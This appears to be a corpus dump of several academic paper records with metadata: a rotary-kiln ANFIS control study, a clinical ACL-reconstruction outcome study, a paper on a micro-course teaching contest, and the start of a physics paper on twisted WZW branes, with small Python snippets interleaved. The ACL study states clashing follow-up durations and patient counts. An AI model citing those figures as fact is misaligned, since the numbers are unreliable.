A further study of the calcination process inside the kiln shows that the material changes its properties to meet the quality requirement (i.e., DC) mainly while passing through the inner pot, because the temperature there is much higher than in other parts of the kiln. This passage normally takes 15 to 20 minutes, depending on the rotary speed. Consequently, the calcination temperature and rotary speed in previous time phases should also be included among the input variables of the model, which matches the time-delay property of the calcination process. After testing different combinations of the temperature and rotary speed over previous time phases, a set of inputs is chosen. During the training process, the cost function of the clustering phase and the checking-data error of ANFIS are monitored, as seen in Figures 7 and 8, respectively. It can be seen that both the cost function and the checking-data error of ANFIS with the new hybrid algorithm are smaller at each epoch and converge more quickly. The detailed performance of the two methods is listed in Table 3.
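A sketch of the time-delay input construction described above is given below; the specific lag set is an illustrative assumption, since the paper chooses the combination by trial.

```python
import numpy as np

def build_lagged_inputs(T, f, lags=(0, 1, 2)):
    """Stack current and delayed samples of temperature T and rotary speed f.

    Inputs per sample t: T at the lags in `lags` plus f at the past lags only;
    the target is the current rotary speed f[t], as in the paper's control model.
    """
    k = max(lags)
    rows, y = [], []
    for t in range(k, len(T)):
        feats = [T[t - l] for l in lags] + [f[t - l] for l in lags if l > 0]
        rows.append(feats)
        y.append(f[t])
    return np.array(rows), np.array(y)
```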
Conclusion
A novel hybrid clustering algorithm combining FCM with the Subtractive Clustering Method is proposed; it proves more efficient, with reduced computation, and leads to more accurate clustering results. ANFIS is employed to establish the control model for the calcination process of an industrial rotary kiln with a satisfactory outcome, setting an example for similar control situations in industry. Coupled with the new hybrid clustering algorithm, the performance of ANFIS improves greatly, with reduced computation in the clustering phase and outputs closer to the original ones. Further study can focus on determining the number of time phases and the time interval in the input vector, since these are currently decided mainly by experience. Also, the effect of the drying part of the rotary kiln on the model is neglected in this paper; the roles of the drying temperature and drying rotary speed in the model are to be taken into consideration as well.
Figure 1 :
Figure 1: Schematic diagram of the rotary kiln.
Figure 2 :
Figure 2: Schematic diagram of the inner pot.
Figure 4 :
Figure 4: Cluster centers from different algorithms on the quasi-random data. (a) The quasi-random data. (b) Cluster centers from Subclust. (c) Cluster centers from FCM. (d) Cluster centers from the hybrid algorithm.
Figure 5 :
Figure 5: Plots of cost function of FCM and hybrid algorithm.
Figure 6 :
Figure 6: Plots of the model's output. (a) Output on training data. (b) Output on checking data.
Figure 7 :
Figure 7: Plots of cost function on clustering phase.
Figure 8 :
Figure 8: Error plots on checking data for ANFIS.
Table 2 :
Clustering performance of FCM and hybrid algorithm.
Table 3 :
Performance comparison between ANFIS with FCM and ANFIS with the new hybrid method. | 2018-12-10T08:46:17.954Z | 2017-01-01T00:00:00.000 | {
"year": 2017,
"sha1": "4567bd19fefb75012153477d1ed3731cf6dfeb56",
"oa_license": "CCBY",
"oa_url": "http://downloads.hindawi.com/journals/mpe/2017/1067351.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "4567bd19fefb75012153477d1ed3731cf6dfeb56",
"s2fieldsofstudy": [
"Engineering",
"Computer Science"
],
"extfieldsofstudy": [
"Mathematics"
]
} |
244290895 | pes2o/s2orc | v3-fos-license | Surgical management of arthroscopic anterior cruciate ligament reconstruction using quadruple hamstring graft and assessment of its functional outcome
The knee joint is one of the most commonly injured joints in the body, and the most commonly injured ligament is the ACL. Owing to ever-increasing road traffic accidents (RTAs) and greater participation in sporting activities, the incidence of ligament injuries of the knee is rising. The ACL, along with the other ligaments and the capsule, is the primary stabilizer of the knee: it prevents anterior translation and restricts valgus and rotational stress to a certain degree. Open reconstruction of the ACL, which was done earlier, is no longer practiced because of complications such as increased post-operative pain, stiffness, and a lengthy rehabilitation phase. Arthroscopic reconstruction of the injured ACL has become the gold standard procedure. The ideal graft for the ACL is still a topic of debate. The most commonly used grafts are the bone-patellar tendon-bone graft and the hamstring graft. The hamstring graft is increasingly used nowadays for the following reasons: ▪ Advanced soft tissue fixation techniques ▪ The increased incidence of anterior knee pain with the bone-patellar tendon-bone graft. This study was done to evaluate the functional outcome of arthroscopic single bundle anterior cruciate ligament reconstruction using a quadrupled hamstring tendon (gracilis and semitendinosus) autograft in anterior cruciate ligament injuries. Methods: Twenty cases of arthroscopic anterior cruciate ligament reconstruction were regularly followed for an average period of 17.6 months in Mamta Medical College, Khammam from August 2019 to March 2021. Results: Among the twenty patients treated with arthroscopic anterior cruciate ligament reconstruction, 45% (9 patients) had an excellent functional outcome, 40% (8 patients) had a good functional outcome, and the remaining 15% (3 patients) had a fair outcome according to the Lysholm knee score. One patient had a superficial infection at the donor site which settled with intravenous antibiotics. One patient developed a deep infection of the donor site with wound gaping, which was managed with wound debridement and secondary closure together with intravenous antibiotics; the wound healed well and the sutures were removed after 10 days. One patient developed a fixed flexion deformity of 10 degrees, with range of movement from 10 to 90 degrees; this patient had poor compliance with the rehabilitation protocol. The mean preoperative IKDC (International Knee Documentation Committee 2000) score was 50.86, while the mean postoperative score was 87.66; there was a significant improvement in the postoperative IKDC score compared with the preoperative score (P value < 0.05). Conclusion: Arthroscopic anterior cruciate ligament reconstruction with a hamstring graft is an excellent treatment option for anterior cruciate ligament deficient knees, and hamstring graft fixation with an endobutton and interference screw gives a good functional outcome. Good functional results are achieved by careful preoperative planning and by respecting the principles of the arthroscopic anterior cruciate ligament reconstruction technique.
Introduction
Objectives ▪ To evaluate the functional outcome of arthroscopic single bundle anterior cruciate ligament reconstruction using quadrupled hamstring tendon (gracilis and semitendinosus) autograft in complete anterior cruciate ligament tears.
▪ To study the complications associated with arthroscopic anterior cruciate ligament reconstruction for complete anterior cruciate ligament tear.
Material and Methodology
This is a prospective study of the functional outcome and complications following arthroscopic anterior cruciate ligament reconstruction, conducted in Mamta Medical College and General Hospital, Khammam from August 2019 to March 2021. Twenty patients operated on for arthroscopic reconstruction of anterior cruciate ligament tears with a hamstring graft were included in this study. The patients were followed up for an average duration of 17.6 months, with a minimum follow-up of 7 months and a maximum of 20 months. All young and middle-aged patients presenting with unilateral knee complaints and a history of knee trauma in the orthopaedic emergency and outpatient departments of Mamta Medical College and General Hospital, Khammam were evaluated: general and local examination of the unaffected knee was performed to establish baseline ligament excursion, after which the affected knee was examined with specific tests for diagnosing anterior cruciate ligament deficiency. Routine radiographs of both knees in the standing position in AP and lateral views were taken, and MRI of the knee was done in all cases to confirm the anterior cruciate ligament tear. Patients with clinical and MRI evidence of symptomatic anterior cruciate ligament insufficiency, including those with associated medial or lateral meniscal tears and grade 1 or 2 medial and lateral collateral ligament injuries, with no history of previous knee surgery and a normal contralateral knee, were included in the study. Individuals with systemic diseases compromising anaesthetic fitness, associated posterior cruciate ligament tears, grade 3 medial or lateral collateral ligament injuries, osteoarthritic knees, associated tibial plateau fractures, or local skin infections were excluded.
Observation and Results: Twenty cases of arthroscopic ACL reconstruction, regularly followed for an average period of 17.6 months, were studied in Mamta Medical College and General Hospital, Khammam from August 2019 to March 2021. The following factors were observed and tabulated:
Discussion
Due to the increased occurrence of road traffic accidents and the growing number of people participating in sports activities, the number of ACL reconstructions being performed has increased. Arthroscopic reconstruction of the injured ACL has become the gold standard and is one of the most common procedures in orthopedics; it has therefore been studied extensively, and the outcomes of ACL reconstruction have gained considerable attention. The choice of graft has been a topic of great debate in recent years. The options include bone-patellar tendon-bone graft, hamstring autograft, quadriceps tendon, various synthetic grafts, and allograft. Among these, the most commonly used are the bone-patellar tendon-bone graft and the hamstring graft. The advantages of the bone-patellar tendon-bone graft include a high ultimate tensile load (approximately 2300 N) and rigid fixation due to its bony ends. The hamstring graft, however, has been increasingly used in recent years: its advantages include decreased surgical site morbidity, a decreased occurrence of patellofemoral adhesions, and a reduced incidence of anterior knee pain. Though the semitendinosus tendon has only 75% and the gracilis only 49% of the strength of the native ACL, the quadrupled semitendinosus or semitendinosus-gracilis graft has a tensile load of around 4108 N.
Our study evaluates the functional outcome of arthroscopic anatomical single bundle ACL reconstruction using a quadrupled hamstring autograft. This prospective study was conducted in Mamta Medical College and General Hospital, Khammam to evaluate the clinical results of arthroscopic single bundle ACL reconstruction. The study group comprised 21 patients, with one patient lost to follow-up. In our study, the most common mode of injury was road traffic accident, followed by sports injuries; one patient was injured by a kick from a bull. Among the sports injuries, Kabaddi was the most common cause of ACL tear. There was a male predominance: 17 (85%) patients were males and 3 (15%) were females. The largest share of patients, 35%, was in the age group of 20-25 years, and 40% of the patients underwent ACL reconstruction 4 to 6 months after injury. The right knee was involved in 11 (55%) patients and the left knee in 9 (45%); there was not much difference in the lateralization of injury. There was an associated meniscal injury in 75% of patients: five patients had an isolated ACL injury, eleven had injury to the medial meniscus, one had injury to the lateral meniscus alone, and three had injury to both the medial and lateral menisci.
The most commonly injured meniscus was the medial meniscus, which is in accordance with other studies. Among the patients with meniscal injuries, three were treated by partial meniscectomy and in one patient a meniscal repair was done; the rest were treated conservatively. The functional outcome of patients with isolated ACL injury was comparable with that of patients with associated meniscal injuries. The most common symptom at presentation was knee pain (40% of patients); the other presenting symptoms were instability (30%) and locking (15%), while 15% of patients presented with both pain and instability. The average duration of follow-up in the present study was 17 months, with a minimum follow-up period of 7 months and a maximum of 27 months. The average Lysholm score at the end of the study was 91.9. From the above studies, it can be seen that the functional outcomes after ACL reconstruction with hamstring graft and with bone-patellar tendon-bone graft are comparable. The mean pre-operative IKDC score in this study was 50.86, whereas the post-operative score was 87.66; there was a significant improvement in the post-operative IKDC score when compared with the pre-operative score. No significant patellofemoral pain was noticed in the patients in our study. Anterior tibial translation was eliminated in 85% of patients examined at a mean of 17 months post-operatively; the remaining 15% (three patients) had a 1+ Lachman test at the follow-up examination. However, the laxity did not correlate with the functional score.
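The significance statement for the IKDC scores corresponds to a paired pre/post comparison. The snippet below illustrates such a test; the score arrays are synthetic placeholders generated around the reported means (50.86 and 87.66), because the paper does not publish per-patient values.

```python
import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
# Synthetic placeholder scores around the reported means; NOT the study data.
pre_ikdc = rng.normal(50.86, 8.0, size=20)
post_ikdc = rng.normal(87.66, 6.0, size=20)

t_stat, p_value = stats.ttest_rel(post_ikdc, pre_ikdc)  # paired t-test
print(f"t = {t_stat:.2f}, p = {p_value:.4g}")           # significant if p < 0.05
```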
In our study, one patient had a deep infection and one patient had a superficial infection. The patient with the deep infection was managed with wound debridement and intravenous antibiotics, while the patient with the superficial infection was managed with antibiotics alone. One patient developed a fixed flexion deformity of 10 degrees, with range of movement from 10 to 90 degrees; this patient had poor compliance with the rehabilitation protocol.
Conclusions
The summary of this prospective study is as follows: ▪ In young active adults, anatomical single bundle reconstruction with a quadrupled hamstring graft gives good functional results. ▪ The absence of patellofemoral pain with the use of a hamstring graft makes it a more desirable option for patients with patellofemoral cartilage disorders or chronic patellofemoral pain. ▪ Hamstring graft fixation with an endobutton and interference screw gives a good functional outcome. ▪ Arthroscopic anterior cruciate ligament reconstruction with a hamstring graft is an excellent treatment option for anterior cruciate ligament deficient knees. | 2021-11-18T16:30:23.581Z | 2021-07-01T00:00:00.000 | {
"year": 2021,
"sha1": "33afccbffb9c5e9478754a6806bb6b3b8d15c6ea",
"oa_license": null,
"oa_url": "https://www.orthopaper.com/archives/2021/vol7issue3/PartK/7-3-120-390.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "85b60ef3513dcb55ad5be15ae5c94979e0cb2d73",
"s2fieldsofstudy": [
"Medicine",
"Engineering"
],
"extfieldsofstudy": []
} |
219408880 | pes2o/s2orc | v3-fos-license | Micro-course Contest of Foreign Languages in China: Problems and Solutions
The present paper is a detailed analysis of the problems and solutions in Microcourse Contest of Foreign Languages in China. The contestants’ problems as well as those of the judges are summarized and critically evaluated, and corresponding solutions to both types of problems are provided.
Introduction
Micro-course Contest of Foreign Languages in China (MCFLC for convenience's sake) is held annually, and the year 2020 will witness its sixth session. MCFLC has grown and matured over the past five years. While numerous teachers benefit greatly from preparing their micro-classes, some problems concerning MCFLC still exist. By pointing out these problems, contestants and judges can seek ways to improve MCFLC, ensuring students' effective learning and the fairness of the contest.
Contestants' Problems and Solutions
The key word "micro" suggests that one of the prominent features of a micro-class is its shortness. As a rule, "the time duration for a micro-class should be no more than 10 minutes" [1]; the required duration for a typical micro-class is 5 to 8 minutes. Yet several contestants' video clips last as long as 10 minutes or even longer, plainly breaking the contest rules. Students are likely to run out of patience with a lengthy micro-class. Teachers should therefore attach the utmost importance to the duration of a micro-class: as long as it captures the essence and concentration of a teaching point, the shorter the time length, the better the learning effect it will provide for students.
Despite accurate pronunciation and intonation and fluent delivery, some contestants fail to make a qualified micro-class because it lacks a focus. A micro-class will never be a superb one if it tries to contain too many points. For instance, one teacher lectures her students on a text passage in her micro-class, explaining vocabulary, structure, difficult sentences, etc., just like a traditional class. As is well known, the main function of a micro-class is to solve a specific problem that students may encounter in their studies; from this perspective, the teacher's micro-class is more like a MOOC than a micro-class. The solution to the lack-of-focus problem is therefore to elaborate on a single point and make the micro-class specific-problem-based.
Another problem that is prevalent among contestants is that many of them tend simply to present facts to students, lacking creativity and originality. For example, some teachers talk about the magic number seven or natural disasters, and their micro-classes are nothing but piles upon piles of facts. There is no point listing facts in another language in a micro-class, as students in this information age can always be better informed and educated through many other channels. Teachers should at least summarize the facts presented in their micro-classes; to do a better job, they should be able to voice their own opinions on the issue at hand.
To some extent, teachers should not only impart knowledge or transmit information to students, but also enlighten them in one way or another to cultivate their comprehensive thinking abilities.
"According to the data analysis of the contestants' works from the first session of MCFLC, of all types of contents, culture and listening and speaking contents account for as high as 46%" [2]. A lot of contestants choose topics such as Chinese or Western culture, public speaking, writing etc. They opt for such topics possibly not because they are helpful to students' learning, but because these topics tend to give their creators more room for making high-quality micro-classes. Actually these topics are all content-based rather than language-based. Quite often, the contents of such minilectures are nothing but some common senses. Students benefit little from such micro-classes because they can easily understand everything in their native tongue. If students can easily understand everything in a foreign language, it only indicates that these students are terrific English speakers. In a sense, it is insignificant to offer such simple content to students with high English proficiency, because for them such simple ideas are just not worth learning. Many students have trouble understanding such mini-lectures not due to its simple "content", but relative complex "language". When it comes to learning a foreign language, what students desire is not information, knowledge, common senses or thought, but the opportunities to practice learning. It is just too ridiculous for a teacher through his or her micro-class to teach students how to give a speech. Students can learn how to deliver an impressive speech all by themselves without the slightest hint of difficulty as they are common senses. Even though students have mastered how to give a super speech after the teacher's mini-lecture, most of them may still be unqualified public speakers because they can never learn linguistically from the teacher's micro-class as language in the microclass is not the focus. It is equally ridiculous for an English teacher to teach students Chinese culture such as acupuncture, a subject with so many specialized terms. Sometimes even the teacher him or herself has difficulty pronouncing all the terms accurately and fluently. How can the teacher expect his or her students to talk about acupuncture with a foreigner with accuracy and fluency just through a 7-minute mini-lecture? The students have to practice themselves to be able to talk about the subject freely. In addition, students have easy access to the learning materials online or in the library, which may present better learning both visually and aurally than the teacher's micro-class.
Some contestants produce very fantastic works, but their sole purpose is to win prizes for their own interests. They carefully design and make their works once a year for the contest, not for the students. They may even appeal to their students, colleagues and family members to vote for their works. However, in reality, they seldom have the habit of making micro-classes on a regular basis and showing them to their students before class. Under this circumstance, micro-class making is by no means a regular activity for teachers. Instead, it has become a self-sufficient thing that has nothing to do with students' learning in the actual learning and teaching practice.
Judges' Problems and Solutions
A qualified judge needs to be a language specialist with sound aesthetic judgment. More importantly, the judge must be patient and do a great deal of research before grading the candidates. Obviously and unfortunately, some judges are simply not that qualified, and their lack of qualification leads to unfairness in the contest. In reality, misjudgments mostly occur in the province-level contests.
Some contestants' works resemble those from previous sessions, yet are still given high scores; evidently the experts involved have not done enough research and have consequently made serious mistakes. One teacher entered the final stage by using a machine to dub her micro-class, but the experts did not discover the truth; one expert even complimented it, claiming that the pronunciation was clear and beautiful, without realizing the artificial nature of the "human" voice. Likewise, in the fifth session held in 2019, one teacher's work contained many mistakes, both grammatical and technical, yet managed to reach the final stage and win a prize. The mistakes left undiscovered reveal either the judges' casual attitudes or their lack of qualification.
So what are the solutions to the problems created by unqualified judges? My suggestions are as follows. First, currently there are only about three judges for each contestant's work; more professional judges (at least seven or nine) are needed, and the highest and the lowest marks should both be discarded. Second, professors should not automatically be chosen as judges; instead, judges should be chosen on their true merits. They should have micro-class-making experience and be recognized for their English proficiency, and they must be able to speak in English face to face with the contestants. Third, cross-provincial mutual evaluation is truly indispensable: a contestant's work from one province should be graded by judges from another two provinces. Fourth, the judging procedures should be published in detail to all contestants, covering at least: Who are the judges? How many judges are involved? What are the judging criteria? And how do the judges judge?
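The proposal to drop the highest and lowest marks before averaging is a trimmed mean; a minimal sketch:

```python
def contest_score(marks):
    """Average after discarding one highest and one lowest mark."""
    if len(marks) < 3:
        raise ValueError("need at least three judges to trim")
    trimmed = sorted(marks)[1:-1]
    return sum(trimmed) / len(trimmed)

# With a seven-judge panel: contest_score([9.0, 8.5, 8.7, 9.8, 6.0, 8.9, 9.1])
# averages the middle five marks.
```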
Conclusion
To ensure students' effective learning and fairness of the contest, the paper lists some problems of MCFLC and offers corresponding solutions. The contestants' problems and solutions are as follows. First, several contestants' micro-classes last too long, and thus the time should be reduced to required criteria. Second, some micro-classes lack a focus, talking extensively. To solve this problem, contestants should elaborate on a point, aiming to solve a single academic problem for their students. Third, some contestants tend to give facts or simple content. Consequently, as teachers they should reflect on their teaching and try to teach something more meaningful by being more creative. Fourth, some contestants take part in the contest for the sole purpose of winning prizes. As to the judges, some of them have adopted casual attitudes or are just unqualified. To change the situation, more responsible judges with high English proficiency are needed. Besides, cross-provincial mutual evaluation and published procedures are also necessary. With the joint effort made by all contestants and judges, MCFLC is sure to have a more promising future. | 2020-05-28T09:15:49.911Z | 2020-05-18T00:00:00.000 | {
"year": 2020,
"sha1": "1ba4c8516c53c8095ab32d85e4bb12cb41149c82",
"oa_license": "CCBY",
"oa_url": "http://www.clausiuspress.com/assets/default/article/2020/05/18/article_1589814910.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "9a455dcd9e83ce1f8c8a1e35c76241fa6fe84dad",
"s2fieldsofstudy": [
"Linguistics",
"Education"
],
"extfieldsofstudy": [
"Political Science"
]
} |
9290977 | pes2o/s2orc | v3-fos-license | Twisted WZW Branes from Twisted REA's ∗
Quantum geometry of twisted Wess--Zumino--Witten branes is formulated in the framework of twisted Reflection Equation Algebras. It is demonstrated how the representation theory of these algebras leads to the correct classification and localisation of branes. A semiclassical formula for quantised brane positions is derived and shown to be consistent with earlier string-theoretic analyses.
Introduction.
Branes on group manifolds and quotients thereof have long been at the focus of research efforts aimed at understanding the deformation of classical geometry and gauge dynamics effected by string propagation in background fluxes 1 . While the branes naturally lead to the concept of a curved noncommutative space [2,3], they are still amenable to direct investigation using diverse methods such as the Lagrangian formalism of the associated WZW models [4,5] confining the branes to (twisted) conjugacy classes, effective field theory formulated in terms of the Dirac-Born-Infeld functional [6] proving their stability, matrix models [2,3] providing a semi-classical picture of the geometry and gauge dynamics, renormalisation group techniques [2,3,7,8] capturing brane condensation phenomena, K-theory [7,9,10] classifying their charges and Boundary Conformal Field Theory (BCFT) offering access to their microscopic structure via the boundary state construction.
In the latter approach, (twisted) branes are identified with states in the Hilbert space of the bulk (or closed string) theory implementing (twisted) gluing conditions for the chiral currents of the bulk CFT (here $a$ is an index of the adjoint representation of the horizontal Lie algebra $g \equiv \mathrm{Lie}\,G$ of the Kac-Moody algebra $g_\kappa$, $n$ enumerates Laurent modes and $B$ is a boundary state label):
$$\big( J^a_n \otimes \mathbf{1} + \omega(\mathbf{1} \otimes J^a_{-n}) \big)\, |B\rangle\!\rangle_\omega = 0, \qquad (1.1)$$
where $\omega$ is an outer automorphism of the current algebra $g_\kappa$ (see, e.g., [11,12]). Thus branes break the full chiral symmetry algebra $g^L_\kappa \times g^R_\kappa$ of the bulk WZW model to the subalgebra spanned by annihilators of $|B\rangle\!\rangle_\omega$, isomorphic to $g_\kappa$.
Non-commutative geometry entered the stage thus set in [2], where a matrix model of "fuzzy" physics of untwisted branes was explicitly derived in the large volume (or, equivalently, large level $\kappa$) limit. The twisted case was then examined at great length in [3], along similar lines. The semiclassical approach of [2] was later extended in [13], where an Ansatz for brane geometry and gauge dynamics at arbitrary level was advanced, based on the fundamental concept of quantum group symmetry, as suggested by the underlying (B)CFT, and the well-known correspondence between untwisted affine Lie algebras $g_\kappa$ and Drinfel'd-Jimbo quantum algebras $U_q(g)$ (see, e.g., [14]). The latter proposal was shown to successfully encode essential (untwisted) brane data such as tensions, localisations, the algebra of functions, internal gauge excitations and interbrane open string modes.
It was also generalised in [15] to a class of orbifold backgrounds, known as simple current orbifolds $SU(N)/\mathbb{Z}_N$, whereby the basic structure of the associated matrix model, a so-called Reflection Equation Algebra (REA) $\mathrm{REA}_q(A_N)$, was examined extensively. The study revealed an attractive geometric picture behind the compact algebraic framework of the REA's, which was next exploited in an explicit construction of some new quantum geometries corresponding to (fractional) orbifold branes. 1 For a review, see: [1]. 2 Cp [16,17,18], see also: the Appendix.
One particular aspect of the non-classical WZW geometry is quantisation of brane locations within G. It can be derived rather straightforwardly from the relative-cohomological constraints on the background fluxes of the relevant Lagrangian boundary WZW model ascertaining welldefinedness of the associated path integral [4]. We shall explicitly refer to some results of the cohomological analysis in what follows.
In this paper, we discuss an algebraic framework relevant to the analysis at arbitrary level of twisted branes on $SU(2n+1)$ group manifolds. Accordingly, we specialise our exposition to the case $g_\kappa = A^{(1)}_{2n}$ (in which $\omega_c$ is the standard $\mathbb{Z}_2$-reflection of the Dynkin diagram). The exposition is centred on the CFT-inspired notion of twisted quantum group symmetry, as represented by so-called twisted Reflection Equation Algebras (tREA) $\mathrm{tREA}_q(A_{2n})$. The latter are directly related to quantum algebras $U'_q(so_{2n+1})$, with a known representation theory [19,20,21,22,23,24,25].
The $U'_q(so_{2n+1})$ are (coideal) subalgebras of $U_q(su_{2n+1})$, a quantum-algebraic counterpart of the classical subalgebra structure $so_{2n+1} \hookrightarrow su_{2n+1}$ [28,29]. Using these facts, we provide evidence of an intricate relationship between twisted boundary states [12,30,31] and the representation theory of the $\omega_c$-invariant subalgebra $so_{2n+1} \cong (su_{2n+1})^{\omega_c}$, and subsequently reconcile our result with the structure of the representation theory of $U'_q(so_{2n+1})$ at $q$ a root of unity, embedded in that of $U_q(su_{2n+1})$. We also rederive the quantisation rule for twisted brane positions within the WZW group manifold of $SU(3)$ (originally obtained from cohomological analysis in [32]), whereby we establish, in direct analogy with the untwisted case, a simple geometric meaning of the Casimir operators of $\mathrm{tREA}_q(A_{2n})$.
Let us now give an outline of the present paper. Section 2. is a warm-up presentation of the classical geometry of the twisted branes. Section 3. discusses chosen features of the twisted Reflection Equation Algebras. Section 4. contains the main results of this work: classification of the twisted branes through the representation theory of the tREA's and a semiclassical derivation of the quantisation rule for brane positions in the SU (2n + 1) group manifold. In the appendices attached, we list further properties of Reflection Equations and the U ′ q (so 2n+1 ) algebras.
Classical geometry of twisted WZW branes.
At the classical level, stable branes of the WZW model in the Lie group target $G$ are described by (twisted) conjugacy classes of the form $C_\omega(t) = \{\, g\, t\, \omega(g)^{-1} : g \in G \,\}$, with $t$ in the "symmetric" subgroup $T^\omega$ of the maximal torus $T \subset G$, i.e. $t \in T$ with $\omega(t) = t$, whence, in particular, the conjugacy classes are invariant under $\omega$. When $G = SU(2n+1)$ and $\omega = \omega_c$ 3 Structures of this kind have long been known to arise naturally in the related context of $(1+1)$-dimensional integrable models on a half-line, with involutively twisted gluing condition for chiral symmetry currents at the boundary, cp [26], see also [27]. 4 As dictated by the CFT.
(the case of interest) we may choose complex conjugation $\rho$ as a group-integrated representative of $\omega$, whereby the above reduces to $C_{\omega_c}(t) = \{\, g\, t\, g^T : g \in G \,\}$ ($T$ denotes transposition). Let $K_t = \{\, h \in G : h\, t\, h^T = t \,\}$ be the stabiliser subgroup (in the twisted adjoint representation) of $t \in T^\omega$. For $t = \mathbf{1}$, the stabiliser $K_t$ coincides with the group $SO(2n+1)$. In the algebraic setup to be developed, we shall encounter a quantum deformation of this group (see Sec. 3). Clearly, $C_\omega(t)$ can be viewed as a homogeneous space, $C_\omega(t) \cong G/K_t$ (2.3). The twisted conjugacy classes are invariant under the twisted adjoint action of the vector subgroup $G \cong G_V \hookrightarrow G_L \times G_R$ of the group of symmetries of the target manifold (2.4). This is a classical counterpart of the symmetry breaking pattern $g^L_\kappa \times g^R_\kappa \to g_\kappa$ mentioned under (1.1). In this context, the distinguished character of the $\omega$-invariant subgroup derives from the fact that a given twisted conjugacy class contains full regular conjugacy classes [32] of all its elements relative to the adjoint action of the subgroup $G^\omega \subset G$ (2.5). The remaining part of the original bulk symmetry, $G_L \times G_R$, translates, just as in the untwisted case, into covariance of the ensuing physical model under rigid one-sided translations of twisted conjugacy classes within $G$ (2.6). This reflects the residual freedom in the definition of the boundary state consisting in the choice of the inner automorphism twisting the gluing condition [11].
Upon specialising the above presentation to the case of $SU(3)$, for the sake of illustration and in preparation for Sec. 4.2, we obtain a classification of twisted branes in terms of twisted conjugacy classes in $SU(3)$. For the specific choice of the group-integrated representative of $\omega$ given by complex conjugation $\rho$, we can parametrise the latter as in (2.7), from which it transpires that there are two species of twisted branes in this background: a 5-dimensional twisted conjugacy class of the group unit, with the maximal stabiliser $SO(3)$, and generic 7-dimensional twisted conjugacy classes which can be regarded as homogeneous spaces $SU(3)/SO(2)$. We shall make explicit use of the parametrisation (2.7) in the sequel.
Twisted Reflection Equations.
In this section, we shall discuss (quantum) algebras relevant to the description of twisted branes.
The arguments we invoke are of the kind presented in [13], i.e. they are based on the pattern of symmetry breaking induced by twisted branes (cp the discussion of the previous section).
Thus we propose to consider a twisted Reflection Equation (tRE), eq. (3.1) (written out in the Appendix), in which $R$ is a bi-fundamental realisation of the standard universal R-matrix of the relevant quantum group $U_q(su_{2n+1})$ and $K_-$ is an operator-valued matrix of generators of the twisted Reflection Equation Algebra $\mathrm{tREA}_q(A_{2n})$ (see the Appendix).
Equations of this kind (parametrised by additional physical quantities) have long been known to describe couplings of bulk modes to the boundary in (1 + 1)-dimensional integrable models on a half-line, with involutively twisted gluing condition for chiral symmetry currents at the boundary (see [26,27], and the references within). Furthermore, the respective algebraic structures ensuing from (3.1) and its dynamical counterpart from the papers cited share many essential features (coideal property, an intimate relation to the so-called symmetric pairs).
The twisted left-right (co)symmetries [13] of the tRE, $K_- \to t^T K_- s$, realised in terms of $(t,s) \in G_L \otimes_R G_R \equiv SU_q(2n+1) \otimes_R SU_q(2n+1)$ (we have $q = e^{\pi i/(\kappa+2n+1)}$, as indicated by the underlying CFT), provide a quantum version of the classical left-right isometry of the group manifold, which should be a symmetry of the problem (to be broken by branes). There is another tRE with the same symmetry properties, eq. (3.2). The transformation rule for $K_+$ reads $K_+ \to (St)\,K_+\,(Ss)^T$ ($S$ is the antipode of the Hopf algebra $SU_q(2n+1)$). As we shall discuss in App. A.2, following [29], the two tRE's define the same quantum algebra $U'_q(so_{2n+1})$ [20], a quantum deformation of $so_{2n+1}$; $\mathrm{tRE}_\pm$ differ in the manner in which the algebra $U'_q(so_{2n+1})$ is embedded in them. In view of the prominent rôle played by $SO(2n+1)$ in the description of twisted $A_{2n}$ branes (see Sec. 2), the appearance of the latter algebra should be regarded as an encouraging fact.
As it turns out [28], we need both $K_+$ and $K_-$ to construct Casimir operators for this algebra. 6
They shall play an important part in our discussion of brane geometries (see Sec. 4.2). The Casimir operators can be cast in the form $c_m = \mathrm{Tr}\big( D\,X^m \big)$ (3.3), where $X := K_- K_+$ and $D := \mathrm{diag}(q^{-2\cdot 2n}, q^{-2\cdot(2n-1)}, \ldots, 1)$, the latter being straightforwardly related to the antipode $S$ through (3.4). In the spirit of the papers [13,15], we would like to identify branes with appropriately chosen irreducible representations of the tREA defined above. Further evidence in favour of such an assignment, as well as the details of the identification, shall be provided in Sec. 4. For the present, though, we focus on a particular consequence of this idea: clearly, it should entail the existence of an algebraic counterpart of (2.4). And indeed, the vector part of the $G_L \otimes_R G_R$ symmetry, realised as in (3.5), possesses the required properties. In addition to preserving the respective tRE's, it also leaves the values of all the $c_m$'s unchanged; this follows from the behaviour of $X$ under the above transformation. Next, we turn to the representation theory of (3.1)-(3.2). Recall that $\mathrm{tREA}_q(A_{2n})$ is related to a particular deformation of $so_{2n+1}$ denoted by $U'_q(so_{2n+1})$, whose representation theory is known in considerable detail (see, e.g., [20,23]). Here, we are interested only in the highest weight irreducible representations. For $q = e^{\pi i/(\kappa+2n+1)}$, these are of the classical type, with the corresponding highest weights truncated to a fundamental domain in a $(\kappa+2n+1)$-dependent way outlined below. We adopt labelling by signatures 7 $m = (m_1, m_2, \ldots, m_n) =: \sum_{i=1}^{n} m_i e_i$, such that all the $m_i$'s are integers or all are half-integers, subject to the dominance condition $m_1 \ge m_2 \ge \cdots \ge m_n \ge 0$ (3.7). The truncation scheme has not been worked out in all generality as of this writing. It is known [23] in the simplest case of $U'_q(so_3)$ (eq. (3.6)), and inspection of the algebra $U'_q(so_5)$ and its representations (cp [20]) reveals that the candidate formula is 8 $m_1 + m_2 \le \kappa + 5$. Thus, it seems plausible that in the general case of irreducible representations of $U'_q(so_{2n+1})$ the highest weights are truncated as $m_1 + m_n \le \kappa + 2n + 1$ (3.8). We shall return to this issue in the next section. 6 In the case at hand, i.e. for the deformation parameter $q$ a root of unity, there are, as usual, additional central elements in the algebra, originally discovered in [22]. They shall not be considered in this paper. In particular, for $A_2$ with our subsequent choice of the representation theory, they are known to carry no interesting information [24]. 7 The signatures can readily be expressed in terms of the Dynkin labels of the corresponding weights: $2m_i = 2\sum_{j=i}^{n-1} \lambda_j + \lambda_n$ ($i < n$), $2m_n = \lambda_n$.
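As a purely computational illustration of the conjectured truncation (3.8), one can enumerate the integer signatures it admits by brute force (half-integer signatures form an analogous second family). This enumeration is our own illustration, not part of the paper's argument.

```python
from itertools import combinations_with_replacement

def admissible_signatures(n, kappa):
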